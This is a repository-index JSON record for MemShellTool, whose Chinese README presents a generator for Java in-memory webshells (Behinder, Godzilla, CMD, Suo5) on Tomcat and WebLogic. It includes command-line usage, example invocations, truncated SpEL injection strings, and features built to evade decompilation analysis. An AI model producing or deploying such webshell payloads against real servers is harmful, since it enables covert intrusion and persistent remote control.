{"id":25406117,"url":"https://github.com/yaoyao-cool/MemShellTool","last_synced_at":"2025-10-31T01:32:11.046Z","repository":{"id":250448965,"uuid":"831718190","full_name":"yaoyao-cool/MemShellTool","owner":"yaoyao-cool","description":"内存马生成工具  Tomcat、Weblogic、CMD、Behinder、Godzilla、Suo5......","archived":false,"fork":false,"pushed_at":"2024-10-27T07:00:01.000Z","size":664,"stargazers_count":18,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-10-27T07:51:27.826Z","etag":null,"topics":["java-memory-shell","memory-shell","webshell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/yaoyao-cool.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-21T12:27:08.000Z","updated_at":"2024-10-27T06:56:20.000Z","dependencies_parsed_at":"2024-07-27T14:44:49.911Z","dependency_job_id":"125667b2-96ca-4bf2-920b-bf5eb2c1bddb","html_url":"https://github.com/yaoyao-cool/MemShellTool","commit_stats":null,"previous_names":["yaoyao-cool/memshelltool"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yaoyao-cool%2FMemShellTool","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yaoyao-cool%2FMemShellTool/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yaoyao-cool%2FMemShellTool/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yaoyao-cool%2FMemShellTool/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/yaoyao-cool","download_url":"https://codeload.github.com/yaoyao-cool/MemShellTool/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239088385,"owners_count":19579434,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["java-memory-shell","memory-shell","webshell"],"created_at":"2025-02-16T05:06:50.107Z","updated_at":"2025-10-31T01:32:11.040Z","avatar_url":"https://github.com/yaoyao-cool.png","language":null,"readme":"# MemShellTool\n\n内存马payload生成工具\n\n# 0x00\n\n- 一键生成内存马payload\n- 支持多种类型webshell、代理工具\n- 多种编码方式\n- 支持生成agent马\n- 应对特殊环境下的payload长度限制，支持通过加载器分离加载\n- 隐藏内存马class中的函数，对抗人工反编译分析\n- 添加gui和反编译功能，可反编译显示注入器和webshell类\n- 完善中......\n\n# 0x01\n\ngui：\n```\njava -jar MemShellTool.jar -gui\n```\n\n命令行：\n```\nusage: java -jar MemShellTool.jar [-ct \u003carg\u003e] [-d] [-h] [-hn \u003carg\u003e] [-icn\n       \u003carg\u003e] [-it \u003carg\u003e] [-k \u003carg\u003e] [-op \u003carg\u003e] [-ot \u003carg\u003e] [-p \u003carg\u003e]\n       [-slt \u003carg\u003e] [-sname \u003carg\u003e] [-st \u003carg\u003e] [-u \u003carg\u003e]\n -ct,--containerType \u003carg\u003e       ContainerType: Tomcat,Weblogic...\n -d,--default                    default option\n -h,--help                       print this message\n -hn,--headerName \u003carg\u003e          access shell with header\n -icn,--injectClassName \u003carg\u003e    loader name\n -it,--injectType \u003carg\u003e          injectType: Single,Loader,ShellCode\n -k,--key \u003carg\u003e                  shell key: GodZilla...need\n -op,--outPath \u003carg\u003e             output path\n -ot,--outTpye \u003carg\u003e             output type\n -p,--password \u003carg\u003e             shell password\n -slt,--shellType \u003carg\u003e          ServerType: CMD,Behinder...\n -sname,--shellClassName \u003carg\u003e   shellClassName: xxxFilter\n -st,--serverType \u003carg\u003e          ServerType: Filter,Valve,Servlet...\n -u,--shellPath \u003carg\u003e            shell url: /shell\n\n-------------------------\n\nAvailable [InjectType]:\n[SINGLE, LOADER, SHELLCODE]\n\n-------------------------\n\nAvailable [Container]:\n[WEBLOGIC, TOMCAT]\n\n-------------------------\n\nContainer [WEBLOGIC] Available ServerType:\n[FILTER]\nContainer [TOMCAT] Available ServerType:\n[FILTER, FILTER, SERVLET, VALVE, WEBSOCKET]\n\n-------------------------\n\nServer Type [FILTER] Available ShellType:\n[BEHINDER, CMD, SUO5, GODZILLA]\nServer Type [FILTER] Available ShellType:\n[BEHINDER, CMD, SUO5, GODZILLA]\nServer Type [SERVLET] Available ShellType:\n[BEHINDER, CMD, GODZILLA]\nServer Type [VALVE] Available ShellType:\n[BEHINDER, CMD, GODZILLA]\nServer Type [WEBSOCKET] Available ShellType:\n[CMD]\n\n-------------------------\n\nAvailable OutTpye:\n[RAW, BASE64, BCEL, JAVASCRIPT, SPEL, EL]\n```\n\nexample：\nspel表达式 tomcat filter 哥斯拉内存马\n```\njava -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st FILTER -u /404 -slt BEHINDER -ot SPEL\n\nspel with JsEngine:\nT(javax.script.ScriptEngineManager).newInstance().getEngineByName(\"js\").eval('var co......\nspel with Spring defineClass:\nT(org.springframework.cglib.core.ReflectUtils).defineClass(\"inje......\n     key             value\n     -------         -------\n     InjectType      SINGLE\n     ServerType      FILTER\n     ContainerType   TOMCAT\n     ShellType       BEHINDER\n     ShellClassName  Helper\n     ShellPath       /404\n     Password        1a1dc91c907325c6\n     Key             key\n     HeaderName      Accept-Header\n     InjectClassName inject_dc58ad\n     OutPath         ./\n     OutTpye         SPEL\n```\n\nSPEL 注入 tomcat websocket内存马\n```\njava -jar MemShellTool-v1.0.jar -d -ct TOMCAT -sname Helper -st WEBSOCKET -u /ws -slt CMD -ot SPEL\n```\n\n注入shell\n\n![img1](img/spel_ws.png)\n\n连接shell\n\n![img2](img/ws_shell.png)\n\n# 0x2\n\n新增fastjson内存马，基于fastjson组件实现内存马功能。\n\n目前支持cmdshell和冰蝎4.0\n\n实现原理参考：https://oh3r.vip/2025/02/05/fastjson%E5%86%85%E5%AD%98%E9%A9%AC/\n\n![img3](img/fastjsonshell.png)\n\n# 0x3\n反编译显示注入器和webshell类\n\n![img4](img/decompile.png)\n","funding_links":[],"categories":["Others"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyaoyao-cool%2FMemShellTool","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyaoyao-cool%2FMemShellTool","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyaoyao-cool%2FMemShellTool/lists"}